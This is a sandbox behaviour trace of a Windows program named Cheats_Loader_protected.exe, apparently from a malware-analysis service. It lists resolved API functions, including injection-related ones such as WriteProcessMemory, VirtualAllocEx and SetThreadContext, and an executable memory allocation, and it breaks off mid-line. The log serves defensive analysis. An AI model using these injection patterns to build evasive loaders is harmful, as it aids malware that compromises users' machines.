# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Mar 3 2020 14:14:30 # Log Creation Date: 16.03.2020 08:39:18.514 Process: id = "1" image_name = "cheats_loader_protected.exe" filename = "c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe" page_root = "0xe94e000" os_pid = "0x13d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x560" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x13dc [0041.587] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0041.587] GetProcAddress (hModule=0x772d0000, lpProcName="DeleteCriticalSection") returned 0x7799fb90 [0041.587] GetProcAddress (hModule=0x772d0000, lpProcName="LeaveCriticalSection") returned 0x779bb250 [0041.587] GetProcAddress (hModule=0x772d0000, lpProcName="EnterCriticalSection") returned 0x779bb2d0 [0041.588] GetProcAddress (hModule=0x772d0000, lpProcName="InitializeCriticalSection") returned 0x779caf20 [0041.588] GetProcAddress (hModule=0x772d0000, lpProcName="VirtualFree") returned 0x772e69d0 [0041.588] GetProcAddress (hModule=0x772d0000, lpProcName="VirtualAlloc") returned 0x772e6970 [0041.588] GetProcAddress (hModule=0x772d0000, lpProcName="LocalFree") returned 0x772e5b40 [0041.588] GetProcAddress (hModule=0x772d0000, lpProcName="LocalAlloc") returned 0x772e5b20 [0041.588] GetProcAddress (hModule=0x772d0000, lpProcName="GetTickCount") returned 0x7733dd50 [0041.588] GetProcAddress (hModule=0x772d0000, lpProcName="QueryPerformanceCounter") returned 0x772e5da0 [0041.588] GetProcAddress (hModule=0x772d0000, lpProcName="GetVersion") returned 0x772e56c0 [0041.588] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentThreadId") returned 0x772e8820 [0041.588] GetProcAddress (hModule=0x772d0000, lpProcName="InterlockedDecrement") returned 0x772e73c0 [0041.588] GetProcAddress (hModule=0x772d0000, lpProcName="InterlockedIncrement") returned 0x772e7420 [0041.589] GetProcAddress (hModule=0x772d0000, lpProcName="VirtualQuery") returned 0x772e6a70 [0041.589] GetProcAddress (hModule=0x772d0000, lpProcName="WideCharToMultiByte") returned 0x772e6b10 [0041.589] GetProcAddress (hModule=0x772d0000, lpProcName="MultiByteToWideChar") returned 0x772e5c40 [0041.589] GetProcAddress (hModule=0x772d0000, lpProcName="lstrlenA") returned 0x772e6c50 [0041.589] GetProcAddress (hModule=0x772d0000, lpProcName="lstrcpynA") returned 0x772e6c10 [0041.589] GetProcAddress (hModule=0x772d0000, lpProcName="LoadLibraryExA") returned 0x772e5aa0 [0041.589] GetProcAddress (hModule=0x772d0000, lpProcName="GetThreadLocale") returned 0x772e5600 [0041.589] GetProcAddress (hModule=0x772d0000, lpProcName="GetStartupInfoA") returned 0x773228e0 [0041.589] GetProcAddress (hModule=0x772d0000, lpProcName="GetProcAddress") returned 0x772e51b0 [0041.589] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleHandleA") returned 0x772e50b0 [0041.589] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleFileNameA") returned 0x772e5070 [0041.589] GetProcAddress (hModule=0x772d0000, lpProcName="GetLocaleInfoA") returned 0x772e5020 [0041.590] GetProcAddress (hModule=0x772d0000, lpProcName="GetCommandLineA") returned 0x772e4cb0 [0041.590] GetProcAddress (hModule=0x772d0000, lpProcName="FreeLibrary") returned 0x772e4c40 [0041.590] GetProcAddress (hModule=0x772d0000, lpProcName="FindFirstFileA") returned 0x7733edb0 [0041.590] GetProcAddress (hModule=0x772d0000, lpProcName="FindClose") returned 0x7733ed70 [0041.590] GetProcAddress (hModule=0x772d0000, lpProcName="ExitProcess") returned 0x772e3cb0 [0041.590] GetProcAddress (hModule=0x772d0000, lpProcName="ExitThread") returned 0x779d6390 [0041.590] GetProcAddress (hModule=0x772d0000, lpProcName="CreateThread") returned 0x772e46b0 [0041.590] GetProcAddress (hModule=0x772d0000, lpProcName="WriteFile") returned 0x7733f180 [0041.590] GetProcAddress (hModule=0x772d0000, lpProcName="UnhandledExceptionFilter") returned 0x772e68d0 [0041.590] GetProcAddress (hModule=0x772d0000, lpProcName="RtlUnwind") returned 0x772e7c10 [0041.590] GetProcAddress (hModule=0x772d0000, lpProcName="RaiseException") returned 0x772e5e20 [0041.591] GetProcAddress (hModule=0x772d0000, lpProcName="GetStdHandle") returned 0x772e5330 [0041.591] GetProcAddress (hModule=0x772d0000, lpProcName="TlsSetValue") returned 0x772e6870 [0041.591] GetProcAddress (hModule=0x772d0000, lpProcName="TlsGetValue") returned 0x772e6850 [0041.591] GetProcAddress (hModule=0x772d0000, lpProcName="TlsFree") returned 0x772e6830 [0041.591] GetProcAddress (hModule=0x772d0000, lpProcName="TlsAlloc") returned 0x772e6820 [0041.591] GetProcAddress (hModule=0x772d0000, lpProcName="lstrcpyA") returned 0x77327060 [0041.591] GetProcAddress (hModule=0x772d0000, lpProcName="lstrcmpA") returned 0x772e6b90 [0041.591] GetProcAddress (hModule=0x772d0000, lpProcName="WriteProcessMemory") returned 0x772e6b70 [0041.591] GetProcAddress (hModule=0x772d0000, lpProcName="WritePrivateProfileStringW") returned 0x77318970 [0041.591] GetProcAddress (hModule=0x772d0000, lpProcName="WritePrivateProfileStringA") returned 0x77318650 [0041.591] GetProcAddress (hModule=0x772d0000, lpProcName="WaitForSingleObject") returned 0x7733eca0 [0041.592] GetProcAddress (hModule=0x772d0000, lpProcName="VirtualUnlock") returned 0x772e6ab0 [0041.592] GetProcAddress (hModule=0x772d0000, lpProcName="VirtualProtectEx") returned 0x772e6a50 [0041.592] GetProcAddress (hModule=0x772d0000, lpProcName="VirtualProtect") returned 0x772e6a30 [0041.592] GetProcAddress (hModule=0x772d0000, lpProcName="VirtualLock") returned 0x772e6a10 [0041.592] GetProcAddress (hModule=0x772d0000, lpProcName="VirtualAllocEx") returned 0x772e6990 [0041.592] GetProcAddress (hModule=0x772d0000, lpProcName="UnmapViewOfFile") returned 0x772e68f0 [0041.592] GetProcAddress (hModule=0x772d0000, lpProcName="TerminateThread") returned 0x772e6800 [0041.592] GetProcAddress (hModule=0x772d0000, lpProcName="SystemTimeToFileTime") returned 0x772e67a0 [0041.592] GetProcAddress (hModule=0x772d0000, lpProcName="SuspendThread") returned 0x772e6770 [0041.592] GetProcAddress (hModule=0x772d0000, lpProcName="Sleep") returned 0x772e6760 [0041.592] GetProcAddress (hModule=0x772d0000, lpProcName="SizeofResource") returned 0x772e6740 [0041.593] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadPriority") returned 0x772e66c0 [0041.593] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadLocale") returned 0x772e6fc0 [0041.593] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadContext") returned 0x772e66a0 [0041.593] GetProcAddress (hModule=0x772d0000, lpProcName="SetLastError") returned 0x772e4f00 [0041.593] GetProcAddress (hModule=0x772d0000, lpProcName="SetFileTime") returned 0x7733f140 [0041.593] GetProcAddress (hModule=0x772d0000, lpProcName="SetFilePointer") returned 0x7733f120 [0041.593] GetProcAddress (hModule=0x772d0000, lpProcName="SetFileAttributesW") returned 0x7733f100 [0041.593] GetProcAddress (hModule=0x772d0000, lpProcName="SetFileAttributesA") returned 0x7733f0f0 [0041.593] GetProcAddress (hModule=0x772d0000, lpProcName="SetEvent") returned 0x7733ec50 [0041.593] GetProcAddress (hModule=0x772d0000, lpProcName="SetErrorMode") returned 0x772e6500 [0041.593] GetProcAddress (hModule=0x772d0000, lpProcName="SetEnvironmentVariableA") returned 0x772e64c0 [0041.593] GetProcAddress (hModule=0x772d0000, lpProcName="SetEndOfFile") returned 0x7733f0e0 [0041.594] GetProcAddress (hModule=0x772d0000, lpProcName="SetCurrentDirectoryW") returned 0x772e64a0 [0041.594] GetProcAddress (hModule=0x772d0000, lpProcName="SetCurrentDirectoryA") returned 0x772e6480 [0041.594] GetProcAddress (hModule=0x772d0000, lpProcName="ResumeThread") returned 0x772e6380 [0041.594] GetProcAddress (hModule=0x772d0000, lpProcName="ResetEvent") returned 0x7733ec40 [0041.594] GetProcAddress (hModule=0x772d0000, lpProcName="RemoveDirectoryW") returned 0x7733f0d0 [0041.594] GetProcAddress (hModule=0x772d0000, lpProcName="RemoveDirectoryA") returned 0x7733f0c0 [0041.594] GetProcAddress (hModule=0x772d0000, lpProcName="ReadProcessMemory") returned 0x772e5e30 [0041.594] GetProcAddress (hModule=0x772d0000, lpProcName="ReadFile") returned 0x7733f090 [0041.594] GetProcAddress (hModule=0x772d0000, lpProcName="QueryDosDeviceW") returned 0x7733f080 [0041.594] GetProcAddress (hModule=0x772d0000, lpProcName="PostQueuedCompletionStatus") returned 0x772e5d20 [0041.594] GetProcAddress (hModule=0x772d0000, lpProcName="OpenProcess") returned 0x772e5cc0 [0041.595] GetProcAddress (hModule=0x772d0000, lpProcName="MulDiv") returned 0x7733e6e0 [0041.595] GetProcAddress (hModule=0x772d0000, lpProcName="MapViewOfFileEx") returned 0x772e5c00 [0041.595] GetProcAddress (hModule=0x772d0000, lpProcName="MapViewOfFile") returned 0x772e5be0 [0041.595] GetProcAddress (hModule=0x772d0000, lpProcName="LockResource") returned 0x772e5bc0 [0041.595] GetProcAddress (hModule=0x772d0000, lpProcName="LoadResource") returned 0x772e5b00 [0041.595] GetProcAddress (hModule=0x772d0000, lpProcName="LoadLibraryExW") returned 0x772e5ac0 [0041.595] GetProcAddress (hModule=0x772d0000, lpProcName="LoadLibraryW") returned 0x772e5ae0 [0041.595] GetProcAddress (hModule=0x772d0000, lpProcName="LoadLibraryA") returned 0x772e5a80 [0041.595] GetProcAddress (hModule=0x772d0000, lpProcName="IsBadWritePtr") returned 0x773231a0 [0041.595] GetProcAddress (hModule=0x772d0000, lpProcName="IsBadStringPtrW") returned 0x772e3bf0 [0041.595] GetProcAddress (hModule=0x772d0000, lpProcName="IsBadReadPtr") returned 0x77323110 [0041.595] GetProcAddress (hModule=0x772d0000, lpProcName="HeapDestroy") returned 0x772e57d0 [0041.596] GetProcAddress (hModule=0x772d0000, lpProcName="HeapCreate") returned 0x772e57b0 [0041.596] GetProcAddress (hModule=0x772d0000, lpProcName="HeapAlloc") returned 0x779b2dc0 [0041.596] GetProcAddress (hModule=0x772d0000, lpProcName="GlobalUnlock") returned 0x773244e0 [0041.596] GetProcAddress (hModule=0x772d0000, lpProcName="GlobalReAlloc") returned 0x77323f90 [0041.596] GetProcAddress (hModule=0x772d0000, lpProcName="GlobalHandle") returned 0x77324420 [0041.596] GetProcAddress (hModule=0x772d0000, lpProcName="GlobalLock") returned 0x773242f0 [0041.596] GetProcAddress (hModule=0x772d0000, lpProcName="GlobalFree") returned 0x772e1ee0 [0041.596] GetProcAddress (hModule=0x772d0000, lpProcName="GlobalFindAtomA") returned 0x77312090 [0041.596] GetProcAddress (hModule=0x772d0000, lpProcName="GlobalDeleteAtom") returned 0x773120b0 [0041.596] GetProcAddress (hModule=0x772d0000, lpProcName="GlobalAlloc") returned 0x772e5750 [0041.596] GetProcAddress (hModule=0x772d0000, lpProcName="GlobalAddAtomA") returned 0x77312050 [0041.597] GetProcAddress (hModule=0x772d0000, lpProcName="GetWindowsDirectoryW") returned 0x772e5730 [0041.597] GetProcAddress (hModule=0x772d0000, lpProcName="GetWindowsDirectoryA") returned 0x772e5710 [0041.597] GetProcAddress (hModule=0x772d0000, lpProcName="GetVolumeInformationA") returned 0x7733f000 [0041.597] GetProcAddress (hModule=0x772d0000, lpProcName="GetVersionExA") returned 0x772e56d0 [0041.597] GetProcAddress (hModule=0x772d0000, lpProcName="GetTimeZoneInformation") returned 0x772e5650 [0041.597] GetProcAddress (hModule=0x772d0000, lpProcName="GetThreadPriority") returned 0x772e5610 [0041.597] GetProcAddress (hModule=0x772d0000, lpProcName="GetThreadContext") returned 0x772e5580 [0041.597] GetProcAddress (hModule=0x772d0000, lpProcName="GetTempPathW") returned 0x7733eff0 [0041.597] GetProcAddress (hModule=0x772d0000, lpProcName="GetTempPathA") returned 0x7733efe0 [0041.597] GetProcAddress (hModule=0x772d0000, lpProcName="GetTempFileNameW") returned 0x7733efd0 [0041.597] GetProcAddress (hModule=0x772d0000, lpProcName="GetTempFileNameA") returned 0x7733efc0 [0041.597] GetProcAddress (hModule=0x772d0000, lpProcName="GetSystemInfo") returned 0x772e54d0 [0041.598] GetProcAddress (hModule=0x772d0000, lpProcName="GetSystemDirectoryW") returned 0x772e5490 [0041.598] GetProcAddress (hModule=0x772d0000, lpProcName="GetSystemDirectoryA") returned 0x772e5400 [0041.598] GetProcAddress (hModule=0x772d0000, lpProcName="GetStringTypeExW") returned 0x772e5390 [0041.598] GetProcAddress (hModule=0x772d0000, lpProcName="GetStringTypeExA") returned 0x772e5370 [0041.598] GetProcAddress (hModule=0x772d0000, lpProcName="GetPrivateProfileStringW") returned 0x77318850 [0041.598] GetProcAddress (hModule=0x772d0000, lpProcName="GetPrivateProfileStringA") returned 0x77318510 [0041.598] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleHandleW") returned 0x772e50d0 [0041.598] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleFileNameW") returned 0x772e5090 [0041.598] GetProcAddress (hModule=0x772d0000, lpProcName="GetLogicalDriveStringsW") returned 0x7733efb0 [0041.598] GetProcAddress (hModule=0x772d0000, lpProcName="GetLocaleInfoW") returned 0x772e5040 [0041.598] GetProcAddress (hModule=0x772d0000, lpProcName="GetLocalTime") returned 0x772e5060 [0041.599] GetProcAddress (hModule=0x772d0000, lpProcName="GetLastError") returned 0x772e5010 [0041.599] GetProcAddress (hModule=0x772d0000, lpProcName="GetFullPathNameW") returned 0x7733efa0 [0041.599] GetProcAddress (hModule=0x772d0000, lpProcName="GetFullPathNameA") returned 0x7733ef90 [0041.599] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileSize") returned 0x7733ef30 [0041.599] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileAttributesExW") returned 0x7733ef00 [0041.599] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileAttributesExA") returned 0x7733eef0 [0041.599] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileAttributesW") returned 0x7733ef10 [0041.599] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileAttributesA") returned 0x7733eee0 [0041.599] GetProcAddress (hModule=0x772d0000, lpProcName="GetExitCodeThread") returned 0x772e4ff0 [0041.599] GetProcAddress (hModule=0x772d0000, lpProcName="GetDriveTypeA") returned 0x7733eec0 [0041.599] GetProcAddress (hModule=0x772d0000, lpProcName="GetDiskFreeSpaceA") returned 0x7733ee80 [0041.599] GetProcAddress (hModule=0x772d0000, lpProcName="GetDateFormatA") returned 0x772e76e0 [0041.600] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentThread") returned 0x772e8810 [0041.600] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentProcessId") returned 0x7733ea20 [0041.600] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentProcess") returned 0x7733ea10 [0041.600] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentDirectoryW") returned 0x772e4e80 [0041.600] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentDirectoryA") returned 0x772e4e60 [0041.600] GetProcAddress (hModule=0x772d0000, lpProcName="GetComputerNameW") returned 0x773132c0 [0041.600] GetProcAddress (hModule=0x772d0000, lpProcName="GetComputerNameA") returned 0x77313780 [0041.600] GetProcAddress (hModule=0x772d0000, lpProcName="GetCommandLineW") returned 0x772e4cc0 [0041.600] GetProcAddress (hModule=0x772d0000, lpProcName="GetCPInfo") returned 0x772e4d10 [0041.600] GetProcAddress (hModule=0x772d0000, lpProcName="GetACP") returned 0x772e4ca0 [0041.600] GetProcAddress (hModule=0x772d0000, lpProcName="FreeResource") returned 0x772e4c80 [0041.601] GetProcAddress (hModule=0x772d0000, lpProcName="InterlockedExchange") returned 0x772e73e0 [0041.601] GetProcAddress (hModule=0x772d0000, lpProcName="FormatMessageW") returned 0x772e4be0 [0041.601] GetProcAddress (hModule=0x772d0000, lpProcName="FormatMessageA") returned 0x772e4bc0 [0041.601] GetProcAddress (hModule=0x772d0000, lpProcName="FlushInstructionCache") returned 0x772e4b60 [0041.601] GetProcAddress (hModule=0x772d0000, lpProcName="FindResourceW") returned 0x772e4aa0 [0041.601] GetProcAddress (hModule=0x772d0000, lpProcName="FindResourceA") returned 0x773227c0 [0041.601] GetProcAddress (hModule=0x772d0000, lpProcName="FindNextFileW") returned 0x7733ee40 [0041.601] GetProcAddress (hModule=0x772d0000, lpProcName="FindNextFileA") returned 0x7733ee20 [0041.601] GetProcAddress (hModule=0x772d0000, lpProcName="FindFirstFileW") returned 0x7733edf0 [0041.601] GetProcAddress (hModule=0x772d0000, lpProcName="FileTimeToLocalFileTime") returned 0x7733ed60 [0041.601] GetProcAddress (hModule=0x772d0000, lpProcName="FileTimeToDosDateTime") returned 0x77321eb0 [0041.602] GetProcAddress (hModule=0x772d0000, lpProcName="EnumCalendarInfoA") returned 0x772fc0d0 [0041.602] GetProcAddress (hModule=0x772d0000, lpProcName="DeviceIoControl") returned 0x772e1170 [0041.602] GetProcAddress (hModule=0x772d0000, lpProcName="DeleteFileW") returned 0x7733ed40 [0041.602] GetProcAddress (hModule=0x772d0000, lpProcName="DeleteFileA") returned 0x7733ed30 [0041.602] GetProcAddress (hModule=0x772d0000, lpProcName="CreateMutexA") returned 0x7733eb40 [0041.602] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileMappingW") returned 0x772e44b0 [0041.602] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileMappingA") returned 0x7731db60 [0041.602] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0041.602] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileA") returned 0x7733ed00 [0041.602] GetProcAddress (hModule=0x772d0000, lpProcName="CreateEventA") returned 0x7733eb00 [0041.602] GetProcAddress (hModule=0x772d0000, lpProcName="CreateDirectoryW") returned 0x7733ece0 [0041.602] GetProcAddress (hModule=0x772d0000, lpProcName="CreateDirectoryA") returned 0x7733ecd0 [0041.603] GetProcAddress (hModule=0x772d0000, lpProcName="CompareStringW") returned 0x772e4430 [0041.603] GetProcAddress (hModule=0x772d0000, lpProcName="CompareStringA") returned 0x772e4410 [0041.603] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0041.603] GetProcAddress (hModule=0x772d0000, lpProcName="IsBadStringPtrA") returned 0x772e3b80 [0041.603] GetModuleHandleA (lpModuleName="user32.dll") returned 0x750c0000 [0041.603] GetProcAddress (hModule=0x750c0000, lpProcName="GetKeyboardType") returned 0x75138d80 [0041.603] GetProcAddress (hModule=0x750c0000, lpProcName="LoadStringA") returned 0x750dd7b0 [0041.603] GetProcAddress (hModule=0x750c0000, lpProcName="MessageBoxA") returned 0x7512d740 [0041.603] GetProcAddress (hModule=0x750c0000, lpProcName="CharNextA") returned 0x750dbf60 [0041.604] GetProcAddress (hModule=0x750c0000, lpProcName="CreateWindowExW") returned 0x750e8780 [0041.605] GetProcAddress (hModule=0x750c0000, lpProcName="CreateWindowExA") returned 0x750e1470 [0041.605] GetProcAddress (hModule=0x750c0000, lpProcName="WindowFromPoint") returned 0x750f4080 [0041.605] GetProcAddress (hModule=0x750c0000, lpProcName="WinHelpA") returned 0x750d8290 [0041.605] GetProcAddress (hModule=0x750c0000, lpProcName="WaitMessage") returned 0x750f4060 [0041.605] GetProcAddress (hModule=0x750c0000, lpProcName="VkKeyScanW") returned 0x750e2340 [0041.605] GetProcAddress (hModule=0x750c0000, lpProcName="UpdateLayeredWindow") returned 0x750e1eb0 [0041.605] GetProcAddress (hModule=0x750c0000, lpProcName="UpdateWindow") returned 0x750d2b80 [0041.606] GetProcAddress (hModule=0x750c0000, lpProcName="UnregisterClassW") returned 0x750e8630 [0041.606] GetProcAddress (hModule=0x750c0000, lpProcName="UnregisterClassA") returned 0x750eb230 [0041.606] GetProcAddress (hModule=0x750c0000, lpProcName="UnhookWindowsHookEx") returned 0x750f3fa0 [0041.606] GetProcAddress (hModule=0x750c0000, lpProcName="TranslateMessage") returned 0x750ef900 [0041.606] GetProcAddress (hModule=0x750c0000, lpProcName="TranslateMDISysAccel") returned 0x7512b350 [0041.606] GetProcAddress (hModule=0x750c0000, lpProcName="TrackPopupMenu") returned 0x7512be20 [0041.606] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoA") returned 0x750d5060 [0041.606] GetProcAddress (hModule=0x750c0000, lpProcName="ShowWindow") returned 0x750f3ee0 [0041.606] GetProcAddress (hModule=0x750c0000, lpProcName="ShowScrollBar") returned 0x750f3ec0 [0041.606] GetProcAddress (hModule=0x750c0000, lpProcName="ShowOwnedPopups") returned 0x750e3650 [0041.606] GetProcAddress (hModule=0x750c0000, lpProcName="ShowCursor") returned 0x750e2820 [0041.607] GetProcAddress (hModule=0x750c0000, lpProcName="SetWindowsHookExW") returned 0x750f0e70 [0041.607] GetProcAddress (hModule=0x750c0000, lpProcName="SetWindowsHookExA") returned 0x750e2730 [0041.607] GetProcAddress (hModule=0x750c0000, lpProcName="SetWindowTextW") returned 0x750cd0c0 [0041.607] GetProcAddress (hModule=0x750c0000, lpProcName="SetWindowTextA") returned 0x750ce620 [0041.607] GetProcAddress (hModule=0x750c0000, lpProcName="SetWindowPos") returned 0x750f3e90 [0041.607] GetProcAddress (hModule=0x750c0000, lpProcName="SetWindowPlacement") returned 0x750f3e80 [0041.607] GetProcAddress (hModule=0x750c0000, lpProcName="SetWindowLongW") returned 0x743c1ab0 [0041.607] GetProcAddress (hModule=0x750c0000, lpProcName="SetWindowLongA") returned 0x750e0a80 [0041.607] GetProcAddress (hModule=0x750c0000, lpProcName="SetTimer") returned 0x750f0370 [0041.607] GetProcAddress (hModule=0x750c0000, lpProcName="SetScrollRange") returned 0x750d50e0 [0041.608] GetProcAddress (hModule=0x750c0000, lpProcName="SetScrollPos") returned 0x750e2380 [0041.608] GetProcAddress (hModule=0x750c0000, lpProcName="SetScrollInfo") returned 0x750d1fa0 [0041.608] GetProcAddress (hModule=0x750c0000, lpProcName="SetRect") returned 0x750dbd40 [0041.608] GetProcAddress (hModule=0x750c0000, lpProcName="SetPropA") returned 0x750e14c0 [0041.610] GetProcAddress (hModule=0x750c0000, lpProcName="SetParent") returned 0x750e25c0 [0041.610] GetProcAddress (hModule=0x750c0000, lpProcName="SetMenuItemInfoW") returned 0x750c8f60 [0041.610] GetProcAddress (hModule=0x750c0000, lpProcName="SetMenuItemInfoA") returned 0x7513f800 [0041.610] GetProcAddress (hModule=0x750c0000, lpProcName="SetMenu") returned 0x750e32c0 [0041.610] GetProcAddress (hModule=0x750c0000, lpProcName="SetForegroundWindow") returned 0x750e2900 [0041.610] GetProcAddress (hModule=0x750c0000, lpProcName="SetFocus") returned 0x750f3d10 [0041.610] GetProcAddress (hModule=0x750c0000, lpProcName="SetCursor") returned 0x750f2bec [0041.610] GetProcAddress (hModule=0x750c0000, lpProcName="SetClassLongA") returned 0x750e3140 [0041.610] GetProcAddress (hModule=0x750c0000, lpProcName="SetCapture") returned 0x750f3c50 [0041.610] GetProcAddress (hModule=0x750c0000, lpProcName="SetActiveWindow") returned 0x750f3c10 [0041.610] GetProcAddress (hModule=0x750c0000, lpProcName="SendMessageW") returned 0x750d07d0 [0041.611] GetProcAddress (hModule=0x750c0000, lpProcName="SendMessageA") returned 0x750d0630 [0041.611] GetProcAddress (hModule=0x750c0000, lpProcName="ScrollWindow") returned 0x750e22d0 [0041.611] GetProcAddress (hModule=0x750c0000, lpProcName="ScreenToClient") returned 0x750d9ad0 [0041.611] GetProcAddress (hModule=0x750c0000, lpProcName="RemovePropA") returned 0x750e1780 [0041.611] GetProcAddress (hModule=0x750c0000, lpProcName="RemoveMenu") returned 0x750f3b90 [0041.611] GetProcAddress (hModule=0x750c0000, lpProcName="ReleaseDC") returned 0x743ba2f0 [0041.611] GetProcAddress (hModule=0x750c0000, lpProcName="ReleaseCapture") returned 0x750e1770 [0041.611] GetProcAddress (hModule=0x750c0000, lpProcName="RegisterWindowMessageA") returned 0x750ef7a0 [0041.611] GetProcAddress (hModule=0x750c0000, lpProcName="RegisterClipboardFormatA") returned 0x750ef7a0 [0041.611] GetProcAddress (hModule=0x750c0000, lpProcName="RegisterClassW") returned 0x750e8720 [0041.611] GetProcAddress (hModule=0x750c0000, lpProcName="RegisterClassA") returned 0x750d7a10 [0041.612] GetProcAddress (hModule=0x750c0000, lpProcName="RedrawWindow") returned 0x743c1b20 [0041.612] GetProcAddress (hModule=0x750c0000, lpProcName="PtInRect") returned 0x750d69d0 [0041.612] GetProcAddress (hModule=0x750c0000, lpProcName="PostQuitMessage") returned 0x750e2bc0 [0041.612] GetProcAddress (hModule=0x750c0000, lpProcName="PostMessageW") returned 0x750ef870 [0041.612] GetProcAddress (hModule=0x750c0000, lpProcName="PostMessageA") returned 0x750db8d0 [0041.612] GetProcAddress (hModule=0x750c0000, lpProcName="PeekMessageA") returned 0x750d87a0 [0041.612] GetProcAddress (hModule=0x750c0000, lpProcName="OffsetRect") returned 0x750d9620 [0041.612] GetProcAddress (hModule=0x750c0000, lpProcName="OemToCharA") returned 0x7512f190 [0041.612] GetProcAddress (hModule=0x750c0000, lpProcName="MsgWaitForMultipleObjects") returned 0x750eeca0 [0041.612] GetProcAddress (hModule=0x750c0000, lpProcName="MessageBoxW") returned 0x7512db70 [0041.612] GetProcAddress (hModule=0x750c0000, lpProcName="MapWindowPoints") returned 0x750e4420 [0041.613] GetProcAddress (hModule=0x750c0000, lpProcName="MapVirtualKeyW") returned 0x750e3370 [0041.891] GetKeyboardType (nTypeFlag=0) returned 4 [0042.037] GetCommandLineA () returned="\"C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe\" " [0042.037] GetStartupInfoA (in: lpStartupInfo=0x13ffdf8 | out: lpStartupInfo=0x13ffdf8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0042.037] GetVersion () returned 0x23f00206 [0042.037] GetVersion () returned 0x23f00206 [0042.037] GetCurrentThreadId () returned 0x13dc [0042.053] GetModuleFileNameA (in: hModule=0xa9a000, lpFilename=0x13ff8f4, nSize=0x105 | out: lpFilename="`È\x9cw\x01" (normalized: "c:\\users\\fd1hvy\\desktop\\`è\x9cw\x01")) returned 0x0 [0042.053] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x13ff7cf, nSize=0x105 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe")) returned 0x33 [0042.053] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x13ff8e4 | out: phkResult=0x13ff8e4*=0x0) returned 0x2 [0042.054] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x13ff8e4 | out: phkResult=0x13ff8e4*=0x0) returned 0x2 [0042.054] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x13ff8e4 | out: phkResult=0x13ff8e4*=0x0) returned 0x2 [0042.054] lstrcpynA (in: lpString1=0x13ff7cf, lpString2="`È\x9cw\x01", iMaxLength=261 | out: lpString1="`È\x9cw\x01") returned="`È\x9cw\x01" [0042.054] GetThreadLocale () returned 0x409 [0042.054] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x13ff8df, cchData=5 | out: lpLCData="ENU") returned 4 [0042.391] lstrlenA (lpString="`È\x9cw\x01") returned 5 [0042.391] LoadStringA (in: hInstance=0xa9a000, uID=0xffd6, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Invalid NULL variant operation") returned 0x1e [0042.392] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x6fd10 [0042.392] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x810000 [0042.392] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x70d10 [0042.392] VirtualAlloc (lpAddress=0x810000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x810000 [0042.392] LoadStringA (in: hInstance=0xa9a000, uID=0xffd5, lpBuffer=0x13ffa18, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 